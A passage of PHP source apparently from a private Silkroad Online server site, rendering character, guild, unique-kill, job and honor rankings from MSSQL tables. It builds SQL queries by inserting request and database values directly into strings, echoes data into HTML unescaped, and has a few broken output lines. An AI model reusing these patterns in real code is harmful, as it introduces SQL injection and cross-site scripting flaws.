$uniquesoso = core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]' and MobName = 'MOB_TQ_BLACKSNAKE' ");
$uniquemedusa = core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]' and MobName = 'MOB_TQ_WHITESNAKE' "); /*
Character Info:
<ul class="unstyled">
<li>Character <i class="icon-user color-green"></i> <b><?php echo $ownerStr;?></b></li>
</ul><img src='img/character/<?php echo $hData[RefObjID];?>.gif' width='75' height="102"> */?>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="50%" colspan="2" class="alert alert-error"> <div align="center"><div align="center">Character Info</div></td>
</tr>
<tr>
<td width="50%">Nick</td>
<td width="50%"><?php echo $hData[CharName16];?></td>
</tr>
<tr>
<td>Guild</td>
<td><?php echo $nGuildName;?></td>
</tr>
<tr>
<td>Job</td>
<td><?php echo $jobType;?></td>
</tr>
<tr>
<td>Player Items </td>
<td><a href='?pg=rank&type=set_char&name=<?php echo $hData[CharName16];?>'><b class='color-green'><?php echo $hData[CharName16];?></b></a></td>
</tr>
<?php /*<tr>
<td>Health points</td>
<td><span class='color-red'> <?php echo $hData[HP];?> </span></td>
</tr>
<tr>
<td>Mana points</td>
<td><span class='color-blue'> <?php echo $hData[MP];?> </span></td>
</tr>
<tr>
<td>Job alias</td>
<td><?php echo $hData[NickName16];?></td>
</tr>*/?>
<tr>
<td>Level</td>
<td><?php echo $hData[CurLevel];?></td>
</tr>
<?php /*<tr>
<td>Experience</td>
<td><?php echo $hData[ExpOffset];?></td>
</tr>*/?>
<tr>
<td>Strength</td>
<td><?php echo $hData[Strength];?></td>
</tr>
<tr>
<td>Intellect</td>
<td><?php echo $hData[Intellect];?></td>
</tr>
<?php /*<tr>
<td>Skill points</td>
<td><?php echo $hData[RemainSkillPoint];?></td>
</tr>
<tr>
<td>Free stat points</td>
<td><?php echo $hData[RemainStatPoint];?></td>
</tr>
<tr>
<td>Berserker</td>
<td><?php echo $hData[RemainHwanCount];?>/5</td>
</tr>*/?>
<tr>
<td>Player Status</td>
<td><?php echo $StatusIS;?></td>
</tr>
<tr>
<td>Last Logout</td>
<td><?php echo $hData[LastLogout];?></td>
</tr>
</table>
<br />
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="50%" colspan="2" class="alert alert-error"> <div align="center">Unique Kills (<b class="color-green">No Titans</b>)</div></td>
<tr>
<td width="50%">Tiger Girl Kills</td>
<td width="50%"><?php echo $uniquetg;?></td>
</tr>
<tr>
<td>Cerberus Kills</td>
<td><?php echo $uniqueker;?></td>
</tr>
<tr>
<td>Captain Ivy</td>
<td><?php echo $uniqueivy;?></td>
</tr>
<tr>
<td>Uruchi</td>
<td><?php echo $uniqueuruchi;?></td>
</tr>
<tr>
<td>Isyutaru</td>
<td><?php echo $uniqueisy;?></td>
</tr>
<tr>
<td>Lord Yarkan</td>
<td><?php echo $uniquelord;?></td>
</tr>
<tr>
<td>Demon Shaitan</td>
<td><?php echo $uniquedemon;?></td>
</tr>
<tr>
<td>SoSo The Black Viper</td>
<td><?php echo $uniquesoso;?></td>
</tr>
<tr>
<td>BeakYung The White Viper (Medusa)</td
><td><?php echo $uniquemedusa;?></td>
</tr>
</table>
<?php core::$sql -> changeDB('acc');
if(core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]'") == 0)
{
echo "This character has no uniques kills!";
}
else
{?>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="50%" colspan="2" class="alert alert-error"> <div align="center">Latest Unique Kills by (<b class="color-green"><?php echo $hData[CharName16];?></b>)</div></td>
</tr>
<td width="50%"><b>Unique name</b></td>
<td width="50%"><b>Time</b></td>
<tr>
<?php $hQuery = core::$sql -> exec("select top 30 * from Evangelion_uniques where CharName='$hData[CharName16]' order by time desc");
while($row = mssql_fetch_array($hQuery))
{
$datetime1 = strtotime($row['time']);
$mssqldate1 = date("d-m-y", $datetime1);
echo "<tr>";
$UniqueType = $row['MobName'];
switch($UniqueType) {
// Tiger Girl
case "MOB_CH_TIGERWOMAN":
echo '<td>Tiger Girl</td><td>'.$mssqldate1.'</td>';
break;
case "MOB_CH_TIGERWOMAN_L3":
echo '<td>Tiger Girl (Titan)</td><td>'.$mssqldate1.'</td>';
break;
// XXX
case "MOB_OA_URUCHI":
echo '<td>Uruchi</td><td>'.$mssqldate1.'</td>';
break;
case "MOB_KK_ISYUTARU":
echo '<td>Isyutaru</td><td>'.$mssqldate1.'</td>';
break;
case "MOB_TK_BONELORD":
echo '<td>Lord Yarkan</td><td>'.$mssqldate1.'</td>';
break;
case "MOB_EU_KERBEROS":
echo '<td>Cerberus</td><td>'.$mssqldate1.'</td>';
break;
case "MOB_AM_IVY":
echo '<td>Captain Ivy</td><td>'.$mssqldate1.'</td>';
break;
case "MOB_RM_TAHOMET":
echo '<td>Demon Shaitan</td><td>'.$mssqldate1.'</td>';
break;
case "MOB_KK_ISYUTARU_L3":
echo '<td>Isyutaru (Titan)</td><td>'.$mssqldate1.'</td>';
break;
case "MOB_TK_BONELORD_L3":
echo '<td>Lord Yarkan (Titan)</td><td>'.$mssqldate1.'</td>';
break;
case "MOB_RM_TAHOMET_L3":
echo '<td>Demon Shaitan (Titan)</td><td>'.$mssqldate1.'</td>';
break;
case "MOB_EU_KERBEROS_L3":
echo '<td>Cerberus (Titan)</td><td>'.$mssqldate1.'</td>';
break;
case "MOB_AM_IVY_L3":
echo '<td>Captain Ivy (Titan)</td><td>'.$mssqldate1.'</td>';
break;
case "MOB_OA_URUCHI_L3":
echo '<td>Uruchi (Titan)</td><td>'.$mssqldate1.'</td>';
break;
case "MOB_TQ_BLACKSNAKE_L3":
echo '<td>SoSo The Hades Viper (Titan)</td><td>'.$mssqldate1.'</td>';
break;
default:
break;
}
echo "</tr>";
}?>
</table>
<?php core::$sql -> changeDB('shard');
}
#misc::back();
} else echo "Owner of account on which this character is created didn't want you to view he's (her) data.<br/>";
}
}
else
{
core::$sql -> changeDB("shard");
$hQuery = core::$sql -> exec("select top 50 * from _Char where CharName16 not like '%[GM]%' order by CurLevel desc");?>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width='10%' align='center' class='thead'><b>#</b></td>
<td width='10%' align='center' class='thead'><b>Race</b></td>
<td width='30%' align='center' class='thead'><b>Charname</b></td>
<td width='20%' align='center' class='thead'><b>Level</b></td>
<!--td width='15%' align='center' class='thead'><b>SP</td-->
<td width='15%' align='center' class='thead'><b>Strength</b></td>
<td width='15%' align='center' class='thead'><b>Intellect</b></td>
</tr>
<?php $n = 1;
while($row = mssql_fetch_array($hQuery))
{
$szUsername = user::usernameByCharname($row['CharName16']);
$bCanView = core::$sql -> getRow("select ispublic from srcms_userprofiles where JID='".user::accountJIDbyUsername($szUsername)."'");
if($bCanView > 0)
{
$icon = "";
if($row['RefObjID'] < 3000) $icon = "<img src='img/Character/race_china.png'>";
else $icon="<img src='img/Character/race_euro.png'>";?>
<tr>
<td align='center'><b><?php echo $n;?></b></td>
<td align='center'><?php echo $icon;?></td>
<td align='center'><a href='?pg=rank&type=char&name=<?php echo $row[CharName16];?>'><b class="color-green"><?php echo $row[CharName16];?></b></a></td>
<td align='center'><?php echo $row[CurLevel];?></td>
<?php /*<td align='center'><?php echo $row[RemainSkillPoint];?></td> */ ?>
<td align='center'><?php echo $row[Strength];?></td>
<td align='center'><?php echo $row[Intellect];?></td>
</tr>
<?php $n++;
}
}?>
</table>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }
}
break;
//Search Character Script.
case('search_char'):
{?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Search Character</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Search Character</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid">
<?php if(!isset($_POST['searchfor']))
{?>
<form method='post' class="reg-page">
Max results: 50!<br />
Charname: <input type='text' name='searchfor' maxlength='16' placeholder='Search Character'>
<br />
<input type='submit' name='submit' value='Search' class="btn-u" >
</form>
<?php }
else
{
$bExit = false;
if(!security::isSecureString($_POST['searchfor'], 3))
{
$bExit = true;?>
<span class="alert alert-error">Character name contains forbidden symbols!</span>
<?php }
if(strlen($_POST['searchfor']) == 0)
{
$bExit = true;?>
<span class="alert alert-error">Character name can't be 0 symbols long!</span>
<?php }
if(strlen($_POST['searchfor']) > 16)
{
$bExit = true;?>
<span class="alert alert-error">Character name too long!</span>
<?php }
if(!$bExit)
{
echo "<br />";
core::$sql -> changeDB('shard');
$hQuery = core::$sql -> exec("select top 50 * from _Char where CharName16 like '%$_POST[searchfor]%'");
$nResults = 0;?>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
<tr>
<td>Char name</td>
</tr>
<?php while($row = mssql_fetch_array($hQuery))
{?>
<tr>
<td><a href='?pg=rank&type=char&name=<?php echo $row[CharName16];?>'><b class="color-green"><?php echo $row[CharName16];?></b></a></td>
</tr>
<?php $nResults++;
}?>
</table>
<?php if($nResults > 0)
{?>
<br /><div class="pull-left">Found [<b class="color-green"><?php echo $nResults;?></b>] characters!</div><br />
<div class="pull-right"><?php echo misc::back();?></div><br />
</table>
<?php }
else echo '<div class="pull-left"> No characters found </div><br /><br /><br />';
}
}
#echo "<br /><br />";
#misc::back();?>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }
break;
//Search Guild System
case('search_guild'):
{?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Search Guild</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Search Guild</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid">
<?php core::$sql -> changeDB('shard');
if(!isset($_POST['search_for']))
{?>
<form method='post' class="reg-page">
Guild name: <input type='text' name='search_for' maxlength='16' placeholder='Search Guild'><br />
<input type='submit' name='submit' value='Search' class="btn-u" >
</form>
<?php }
else
{
$bExit = false;
if(!security::isSecureString($_POST['search_for'], 3))
{
$bExit = true;?>
<span class="alert alert-error">Guild name contains forbidden symbols !</span>
<?php }
if(strlen($_POST['search_for']) == 0)
{
$bExit = true;?>
<span class="alert alert-error">Guild name length can't be 0</span>
<?php }
if(strlen($_POST['search_for']) > 16)
{
$bExit = true;?>
<span class="alert alert-error">Guild name too long</span>
<?php }
if(!$bExit)
{
core::$sql -> changeDB('shard');
$hQuery = core::$sql -> exec("select top 50 * from _Guild where Name like '%$_POST[search_for]%'");
if($nResults = mssql_num_rows($hQuery) > 0)
{?>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
<tr>
<td>Guild name</td>
</tr>
<?php while($row = mssql_fetch_array($hQuery))
{?>
<tr>
<td><a href='?pg=rank&type=guild&name=<?php echo $row[Name];?>'><b class="color-green"><?php echo $row[Name];?></b></a></td>
</tr>
<?php }?>
</table>
<br /><br />Total results: [<b class="color-green"><?php echo $nResults;?></b>]<br />
<div class="pull-right"><?php echo misc::back();?></div><br />
<?php }
else echo "No results!<br /><br />";
}
}
#echo "<br /><br />";
#misc::back();?>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php
}
break;
//Guilds Ranking
case('guild'):
{?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Guild Ranking</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Guild Ranking</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid">
<?php core::$sql -> changeDB('shard');
if(!isset($_GET['name']))
{
$hQuery = core::$sql -> exec("select top 50 * from _Guild where ID > 0 and ID != 24 order by Lvl desc,GatheredSP desc");?>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
<tr>
<td align='center' class='thead'><b>#</b></td>
<td align='center' class='thead'><b>Name</b></td>
<td align='center' class='thead'><b>Level</b></td>
<td align='center' class='thead'><b>Members</b></td>
<td align='center' class='thead'><b>Points</b></td>
</tr>
<?php $nGuild = 1;
while($row = mssql_fetch_array($hQuery))
{
$nMembers = core::$sql -> getRow("select count(*) from _GuildMember where GuildID='$row[ID]'");?>
<tr>
<td align='center'><b><?php echo $nGuild;?></b></td>
<td align='center'><a href='?pg=rank&type=guild&name=<?php echo $row[Name];?>'><b class="color-green"><?php echo $row[Name];?></b></a></td>
<td align='center'><?php echo $row[Lvl];?></td>
<td align='center'><?php echo $nMembers;?></td>
<td align='center'><?php echo $row[GatheredSP];?></td>
</tr>
<?php $nGuild++;
}?>
</table>
<?php echo misc::back();
#misc::back();
}
else
{
if(security::isSecureString($_GET['name'], 3))
{
if(core::$sql -> numRows("select * from _Guild where Name='$_GET[name]'") == 0)
{
echo "Guild with such name not found.";
}
else
{
$hGuildData = mssql_fetch_array(mssql_query("select * from _Guild where Name='$_GET[name]'"));
$hGuildMembers = core::$sql -> exec("select * from _GuildMember where GuildID='$hGuildData[ID]' order by MemberClass asc,Contribution DESC,GuildWarKill DESC,CharLevel DESC,GP_Donation DESC");
/*
for guild Gold add those lines :
<td align='center'>Gold</td>
<td align='center'>$hGuildData[Gold]</td>
*/?>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
<tr>
<td align='center'><b>Name</b></td>
<td align='center'><b class="color-green"><?php echo $hGuildData[Name];?></b></td>
</tr>
<tr>
<td align='center'><b>Level</b></td>
<td align='center'><?php echo $hGuildData[Lvl];?></td>
</tr>
<tr>
<td align='center'><b>Points</b></td>
<td align='center'><?php echo $hGuildData[GatheredSP];?></td>
</tr>
<tr>
<td align='center'><b>Foundation</b></td>
<td align='center'><?php echo $hGuildData[FoundationDate];?></td>
</tr>
</table>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width='5%' align='center' class='thead'><b>#</td>
<td width='5%' align='center' class='thead'><b>Race</b></td>
<td width='15%' align='center' class='thead'><b>Charname</b></td>
<td width='15%' align='center' class='thead'><b>Nick</b></td>
<td width='10%' align='center' class='thead'><b>Level</b></td>
<td width='15%' align='center' class='thead'><b>Donation</b></td>
<td width='15%' align='center' class='thead'><b>Guild War Kills</b></td>
<td width='15%' align='center' class='thead'><b>Guild War Killed</b></td>
<td width='15%' align='center' class='thead'><b>Type</b></td>
</tr>
<?php $n = 1;
while($row = mssql_fetch_array($hGuildMembers))
{
$cName = char::charnameByCharID($row['CharID']);
$szNickname = "";
$nRefObjID = core::$sql -> getRow("select RefObjID from _Char where CharName16='$cName'");
$icon = "";
if($nRefObjID < 3000) $icon = "<img src='img/Character/race_china.png'>";
else $icon="<img src='img/Character/race_euro.png'>";
$memberType = "";
if($row['MemberClass'] == 0) $memberType = "<font class='color-red'>Master</font>";
else
$memberType = "Member";
if(empty($row['Nickname'])) $szNickname = "<font color='blue'>NONE</font>";
else $szNickname = $row['Nickname'];?>
<tr>
<td align='center'><?php echo $n;?></td>
<td align='center'><?php echo $icon;?></td>
<td align='center'><a href='?pg=rank&type=char&name=<?php echo $cName;?>'><b class="color-green"><?php echo $cName;?></a></td>
<td align='center'><?php echo $szNickname;?></td>
<td align='center'><?php echo $row[CharLevel];?></td>
<td align='center'><?php echo $row[GP_Donation];?></td>
<td align='center'><?php echo $row[GuildWarKill];?></td>
<td align='center'><?php echo $row[GuildWarKilled];?></td>
<td align='center'><?php echo $memberType;?></td>
</tr>
<? $n++;
}
echo "</table>";
misc::back();
}
} else echo "Invalid guild name.";
}?>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php
}
break;
//Unique Kills Ranking
case('unique'):
{?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Unique Ranking</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Unique Ranking</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid">
<?php core::$sql -> changeDB('acc');
$n = 1;
$hQuery = core::$sql -> exec("select top 100 * from Evangelion_uniques order by time desc");?>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
<tr>
<td>#</td>
<td>Charname</td>
<td>Unique</td>
<td>Time</td>
</tr>
<?php while($row = mssql_fetch_array($hQuery))
{
$UniqueType = $row['MobName'];
switch($UniqueType) {
// Tiger Girl
case "MOB_CH_TIGERWOMAN":
echo '<tr><td>'.$n.'</td><td><a href="?pg=rank&type=char&name='.$row['CharName'].'"><b class="color-green">'.$row['CharName'].'</b></a></td><td>Tiger Girl</td><td>'.$row['time'].'</td></tr>';
break;
//Cerberus
case "MOB_EU_KERBEROS":
echo '<tr><td>'.$n.'</td><td><a href="?pg=rank&type=char&name='.$row['CharName'].'"><b class="color-green">'.$row['CharName'].'</b></a></td><td>Cerberus</td><td>'.$row['time'].'</td></tr>';
break;
//Captain Ivy
case "MOB_AM_IVY":
echo '<tr><td>'.$n.'</td><td><a href="?pg=rank&type=char&name='.$row['CharName'].'"><b class="color-green">'.$row['CharName'].'</b></a></td><td>Captain Ivy</td><td>'.$row['time'].'</td></tr>';
break;
//Uruchi
case "MOB_OA_URUCHI":
echo '<tr><td>'.$n.'</td><td><a href="?pg=rank&type=char&name='.$row['CharName'].'"><b class="color-green">'.$row['CharName'].'</b></a></td><td>Uruchi</td><td>'.$row['time'].'</td></tr>';
break;
//Isyutaru
case "MOB_KK_ISYUTARU":
echo '<tr><td>'.$n.'</td><td><a href="?pg=rank&type=char&name='.$row['CharName'].'"><b class="color-green">'.$row['CharName'].'</b></a></td><td>Isyutaru</td><td>'.$row['time'].'</td></tr>';
break;
//Lord Yarkan
case "MOB_TK_BONELORD":
echo '<tr><td>'.$n.'</td><td><a href="?pg=rank&type=char&name='.$row['CharName'].'"><b class="color-green">'.$row['CharName'].'</b></a></td><td>Lord Yarkan</td><td>'.$row['time'].'</td></tr>';
break;
//Demon Shaitan
case "MOB_RM_TAHOMET":
echo '<tr><td>'.$n.'</td><td><a href="?pg=rank&type=char&name='.$row['CharName'].'"><b class="color-green">'.$row['CharName'].'</b></a></td><td>Demon Shaitan</td><td>'.$row['time'].'</td></tr>';
break;
//Medusa
case "MOB_TQ_BLACKSNAKE":
echo '<tr><td>'.$n.'</td><td><a href="?pg=rank&type=char&name='.$row['CharName'].'"><b class="color-green">'.$row['CharName'].'</b></a></td><td>SoSo The Black Viper </td><td>'.$row['time'].'</td></tr>';
break;
//Anything Else will be posted has pk2 name (must be added to those lines if you wanna add a real name.
default:
break;
}
$n++;
}?>
</table>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php
}
break;
// Job Ranking
case('job'):
{
core::$sql -> changeDB("shard");
$hQuery = core::$sql -> exec("select top 50 * from _CharTrijob order by Contribution desc, Exp desc, Level desc");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Job Rankings</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Job Rankings</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid">
<table class='table table-striped' border='0' cellpadding='0' cellspacing='0'>
<tr>
<td align='center'><a href='?pg=rank&type=jobtrader'><img src='img/trader-icon.png' alt='Trader'/> Trader</a></td>
<td align='center'><a href='?pg=rank&type=jobthief'><img src='img/thief-icon.png' alt='Thief'/> Thief</a></td>
<td align='center'><a href='?pg=rank&type=jobhunter'><img src='img/hunter-icon.png' alt='Hunter'/> Hunter</a></td>
<td align='center'><a href='?pg=rank&type=job'><img src='img/trader-icon.png' alt='Trader'/><img src='img/hunter-icon.png' alt='Hunter'/><img src='img/thief-icon.png' alt='Thief'/> All</a></td>
</tr>
</table>
<table class='table table-striped' border='0' cellpadding='0' cellspacing='0'>
<tr>
<td align='center'><b>#</b></td>
<td align='center'><b>Char name</b></td>
<td align='center'><b>Job type</b></td>
<td align='center'><b>Exp</b></td>
<td align='center'><b>Contribution</b></td>
</tr>
<?php $n = 1;
while($row = mssql_fetch_array($hQuery))
{
$jobType = char::jobTypeByID($row['JobType']);
$charName = char::charnameByCharID($row['CharID']);?>
<tr>
<td align='center'><b><?php echo $n;?></b></td>
<td align='center'><a href='?pg=rank&type=char&name=<?php echo $charName;?>'><?php echo $charName;?></a></td>
<td align='center'><?php echo $jobType;?></td>
<td align='center'><?php echo $row[Exp];?></td>
<td align='center'><?php echo $row[Contribution];?></td>
</tr>
<?php $n++;
}?>
</table>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php break;
}
//Job Ranking - Thiefs Only
case('jobthief'):
{
core::$sql -> changeDB("shard");
$hQuery = core::$sql -> exec("select top 50 * from _CharTrijob where JobType = 2 order by Contribution desc, Exp desc, Level desc");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Job Thief</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Job Thief</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid">
<table class='table table-striped' border='0' cellpadding='0' cellspacing='0'>
<tr>
<td align='center'><a href='?pg=rank&type=jobtrader'><img src='img/trader-icon.png' alt='Trader'/> Trader</a></td>
<td align='center'><a href='?pg=rank&type=jobthief'><img src='img/thief-icon.png' alt='Thief'/> Thief</a></td>
<td align='center'><a href='?pg=rank&type=jobhunter'><img src='img/hunter-icon.png' alt='Hunter'/> Hunter</a></td>
<td align='center'><a href='?pg=rank&type=job'><img src='img/trader-icon.png' alt='Trader'/><img src='img/hunter-icon.png' alt='Hunter'/><img src='img/thief-icon.png' alt='Thief'/> All</a></td>
</tr>
</table>
<table class='table table-striped' border='0' cellpadding='0' cellspacing='0'>
<tr>
<td align='center'><b>#</b></td>
<td align='center'><b>Char name</b></td>
<td align='center'><b>Job type</b></td>
<td align='center'><b>Exp</b></td>
<td align='center'><b>Contribution</b></td>
</tr>
<?php $n = 1;
while($row = mssql_fetch_array($hQuery))
{
$jobType = char::jobTypeByID($row['JobType']);
$charName = char::charnameByCharID($row['CharID']);?>
<tr>
<td align='center'><b><?php echo $n;?></b></td>
<td align='center'><a href='?pg=rank&type=char&name=<?php echo $charName;?>'>$charName;?></a></td>
<td align='center'><?php echo $jobType;?></td>
<td align='center'><?php echo $row[Exp];?></td>
<td align='center'><?php echo $row[Contribution];?></td>
</tr>
<?php $n++;
}?>
</table>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php break;
}
//Job Ranking - Hunters Only
case('jobhunter'):
{
core::$sql -> changeDB("shard");
$hQuery = core::$sql -> exec("select top 50 * from _CharTrijob where JobType = 3 order by Contribution desc, Exp desc, Level desc");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Job Hunter</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Job Hunter</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid">
<table class='table table-striped' border='0' cellpadding='0' cellspacing='0'>
<tr>
<td align='center'><a href='?pg=rank&type=jobtrader' ><img src='img/trader-icon.png' alt='Trader'/> Trader</a></td>
<td align='center'><a href='?pg=rank&type=jobthief'><img src='img/thief-icon.png' alt='Thief'/> Thief</a></td>
<td align='center'><a href='?pg=rank&type=jobhunter'><img src='img/hunter-icon.png' alt='Hunter'/> Hunter</a></td>
<td align='center'><a href='?pg=rank&type=job'><img src='img/trader-icon.png' alt='Trader'/><img src='img/hunter-icon.png' alt='Hunter'/><img src='img/thief-icon.png' alt='Thief'/> All</a></td>
</tr>
</table>
<table class='table table-striped' border='0' cellpadding='0' cellspacing='0'>
<tr>
<td align='center'><b>#</b></td>
<td align='center'><b>Char name</b></td>
<td align='center'><b>Job type</b></td>
<td align='center'><b>Exp</b></td>
<td align='center'><b>Contribution</b></td>
</tr>
<?php $n = 1;
while($row = mssql_fetch_array($hQuery))
{
$jobType = char::jobTypeByID($row['JobType']);
$charName = char::charnameByCharID($row['CharID']);?>
<tr>
<td align='center'><b><?php echo $n;?></b></td>
<td align='center'><a href='?pg=rank&type=char&name=<?php echo $charName;?>'><?php echo $charName;?></a></td>
<td align='center'><?php echo $jobType;?></td>
<td align='center'><?php echo $row[Exp];?></td>
<td align='center'><?php echo $row[Contribution];?></td>
</tr>
<?php $n++;
}?>
</table>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php break;
}
//Job Ranking - Trader Only
case('jobtrader'):
{
core::$sql -> changeDB("shard");
$hQuery = core::$sql -> exec("select top 50 * from _CharTrijob where JobType = 1 order by Contribution desc, Exp desc, Level desc");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Job Trader</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Job Trader</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid">
<table class='table table-striped' border='0' cellpadding='0' cellspacing='0'>
<tr>
<td align='center'><a href='?pg=rank&type=jobtrader'><img src='img/trader-icon.png' alt='Trader'/> Trader</a></td>
<td align='center'><a href='?pg=rank&type=jobthief'><img src='img/thief-icon.png' alt='Thief'/> Thief</a></td>
<td align='center'><a href='?pg=rank&type=jobhunter'><img src='img/hunter-icon.png' alt='Hunter'/> Hunter</a></td>
<td align='center'><a href='?pg=rank&type=job'><img src='img/trader-icon.png' alt='Trader'/><img src='img/hunter-icon.png' alt='Hunter'/><img src='img/thief-icon.png' alt='Thief'/> All</a></td>
</tr>
</table>
<table class='table table-striped' border='0' cellpadding='0' cellspacing='0'>
<tr>
<td align='center'><b>#</b></td>
<td align='center'><b>Char name</b></td>
<td align='center'><b>Job type</b></td>
<td align='center'><b>Exp</b></td>
<td align='center'><b>Contribution</b></td>
</tr>
<?php $n = 1;
while($row = mssql_fetch_array($hQuery))
{
$jobType = char::jobTypeByID($row['JobType']);
$charName = char::charnameByCharID($row['CharID']);?>
<tr>
<td align='center'><b><?php echo $n;?></b></td>
<td align='center'><a href='?pg=rank&type=char&name=$charName;?>'>$charName;?></a></td>
<td align='center'><?php echo $jobType;?></td>
<td align='center'><?php echo $row[Exp];?></td>
<td align='center'><?php echo $row[Contribution];?></td>
</tr>
<?php $n++;
}?>
</table>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php break;
}
//Honor Ranking
case('honor'):
{
core::$sql -> changeDB("shard");
$hHonorRank = core::$sql -> exec("select * from _TrainingCampHonorRank where CampID IS NOT NULL order by Ranking ASC");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Honor Rankings</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Honor Rankings</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid">
<table class='table table-striped' border='0' cellpadding='0' cellspacing='0'>
<tr>
<td align='center'><b>#</b></td>
<td align='center'><b>Owner</b></td>
<td align='center'><b>Graduates</b></td>
</tr>
<?php
while($row = mssql_fetch_array($hHonorRank))
{
$data = misc::getCampDataByID($row['CampID']);?>
<tr>
<td align='center'><b><?php echo $row[Ranking];?></b></td>
<td align='center'><a href='?pg=rank&type=char&name=<?php echo $data[OwnerName];?>'><?php echo $data[OwnerName];?></a></td>
<td align='center'><?php echo $data[GraduateCount];?></td>
</tr>
<?php }?>
</table>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }
break;
//We'll be added in future updates.
case('set_plus'):
core::$sql -> changeDB("shard");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Character Items</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
